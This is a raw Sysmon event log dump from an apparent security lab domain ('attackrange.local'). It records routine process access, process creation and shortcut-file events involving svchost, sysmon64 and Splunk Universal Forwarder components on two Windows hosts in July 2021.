\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806077Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.245{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806076Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.245{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F2D8-60EB-3B79-00000000D001}1056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806075Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.245{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806074Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.230{0C1E0330-F2D8-60EB-3B79-00000000D001}1056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000001046012Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:24.176{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\Local Disk (C).lnk2021-07-12 07:44:24.176 11241100x80000000000000001046011Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:24.175{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\Temp.lnk2021-07-09 11:41:53.105 23542300x80000000000000001046010Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:24.174{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\Temp.lnkMD5=5B22BDA347FB1CD053579F9F48B338F8,SHA256=DD33F7D15DB8053456579D01FFE48AA9391F24C8F2B5DFDE536A5732F164F069,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001046009Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:24.155{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\Temp.lnk2021-07-09 11:41:53.105 23542300x80000000000000001046008Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:24.155{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\Temp.lnkMD5=98F916204B1BFE6EDCE8A3DE463888FD,SHA256=36216418E32609EA2015155783A773C74BD126B45F7F969E566DCFDDAC17E7B7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001046007Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:24.124{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnk2021-07-12 07:44:24.124 23542300x80000000000000001046014Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:25.392{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00D126EE42CE3927B38292B34E84F9C3,SHA256=95D734F92F68D2E435F832CCD8D6B7B2A29ED5F375E5D841A8AB06DB3B00D6CC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806117Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:25.761{0C1E0330-F2D9-60EB-3D79-00000000D001}20001140C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806116Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:25.620{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F2D9-60EB-3D79-00000000D001}2000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806115Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:25.620{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806114Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:25.620{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806113Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:25.620{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806112Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:25.620{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806111Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:25.620{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806110Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:25.620{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806109Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:25.620{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806108Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:25.605{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806107Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:25.605{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806106Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:25.605{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F2D9-60EB-3D79-00000000D001}2000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806105Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:25.605{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F2D9-60EB-3D79-00000000D001}2000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806104Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:25.605{0C1E0330-F2D9-60EB-3D79-00000000D001}2000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806103Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:25.245{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DF65A053BEA574591998FDD9C246F52F,SHA256=09ABFDA1E83743F76CABDC1A5DFC1E5383955AE70D652522DCBC0239EE7C6960,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806102Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:25.245{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D585CE5E9B65BB526C064D826E460672,SHA256=41196DF8BC374D71A5ED3FCD1A2FE9C85BD5EDF0E17B4D870C6BA598ACAFE066,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046015Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:26.453{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AAB55C13808214866890E32204FD29A,SHA256=7274F81BCE994CAA77609B6E985BBDDAC82C0A71FDAA1114C37742694D6A8B02,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806145Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.995{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F2DA-60EB-3F79-00000000D001}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806144Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.995{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806143Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.995{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806142Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.995{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806141Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 